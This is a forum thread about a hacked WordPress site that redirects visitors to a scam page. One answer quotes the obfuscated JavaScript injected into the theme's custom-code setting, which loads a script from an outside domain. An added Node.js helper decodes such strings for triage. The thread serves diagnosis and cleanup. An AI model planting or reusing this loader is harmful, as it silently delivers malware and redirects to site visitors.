-1

Today my client told me that his website automatically redirects to an external scam website. At first sight there is no problem in the file directories, and no injections in the settings fields.

Wordfence does not report any type of warning, but Avast Antivirus on the client machine reports a trojan warning:

"JS:Fakepush-A [Trj]" infection

WordPress version 5.4.1. Theme: Newspaper V 6.6.4

Any ideas?

2 Answers

0

After a closer look I found a portion of code that seemed foreign to the original project, in the theme settings -> Custom Code -> Custom Javascript:

    var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);
    var d=document;
    var s=d.createElement(String.fromCharCode(115,99,114,105,112,116));
    s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);
    var pl = u;
    s.src=pl;
    if (document.currentScript) {
        document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
        d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);
        var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));
        list.insertBefore(s, list.childNodes[0]);
    }

Removed. After a total cache clean (.js min included) the website doesn't redirect anymore. Moreover, I think that the theme needs an upgrade.
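Added example (not part of the original answer): a small Node.js triage helper that statically decodes String.fromCharCode(...) calls in a stored snippet, without executing it, so the hidden strings can be read and a script loader flagged. The function names are hypothetical, the sample input is the opening statements of the snippet quoted above, and the hex-literal support goes beyond what that snippet uses.

```javascript
// Added example: decode String.fromCharCode(...) calls without eval and
// flag snippets that build a <script> element pointing at a decoded URL.

// Sample input: opening statements of the snippet quoted in the answer above.
const SAMPLE =
  'var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,' +
  '116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,' +
  '46,99,111,109,47,106,46,106,115,63,118,61);var d=document;' +
  'var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); ' +
  's.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,' +
  '105,112,116); var pl = u; s.src=pl;';

// One numeric argument: decimal, or hex (assumed variant, not in the sample).
const NUM = '(?:0x[0-9a-fA-F]+|\\d+)';
const CALL_RE = new RegExp(
  'String\\.fromCharCode\\(\\s*((?:' + NUM + '\\s*,\\s*)*' + NUM + ')\\s*\\)',
  'g'
);

// Return every literal-only fromCharCode call with its offset and decoded text.
function decodeCharCodeCalls(source) {
  const found = [];
  for (const m of source.matchAll(CALL_RE)) {
    const codes = m[1].split(',').map((n) => Number(n.trim()));
    found.push({ offset: m.index, text: String.fromCharCode(...codes) });
  }
  return found;
}

// Summarise a snippet: decoded strings, decoded URLs, and whether it looks
// like a dynamic script loader (decoded "script" tag name + createElement).
function triage(source) {
  const decoded = decodeCharCodeCalls(source).map((d) => d.text);
  const urls = decoded.filter((t) => /^(https?:)?\/\//i.test(t));
  const buildsScript =
    decoded.some((t) => t.toLowerCase() === 'script') &&
    /createElement\s*\(/.test(source);
  return { decoded, urls, suspicious: urls.length > 0 && buildsScript };
}

console.log(triage(SAMPLE));
```

The same functions can be run over an export of the theme's custom-code options or a database dump to list every encoded string for review.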

0

There are multiple things you need to check.

The redirect that you speak of can be present in header.php, footer.php, or any JavaScript file that loads. Check for malicious files in the wp-content/upload folder.

You will need to check database tables as well.

I would recommend installing Wordfence and scanning the site as well.

Once you remove and test it you will need to improve the security of it - check all the plugins are up to date and if any of them have any vulnerabilities. I found this website very useful: https://wpvulndb.com/plugins

Fresz
No suspicious code in header.php or footer.php. Wordfence does not alert on anything. Thanks for the useful website. I will proceed to check the db one more time. – Luca Scandroglio Jun 01 '20 at 12:16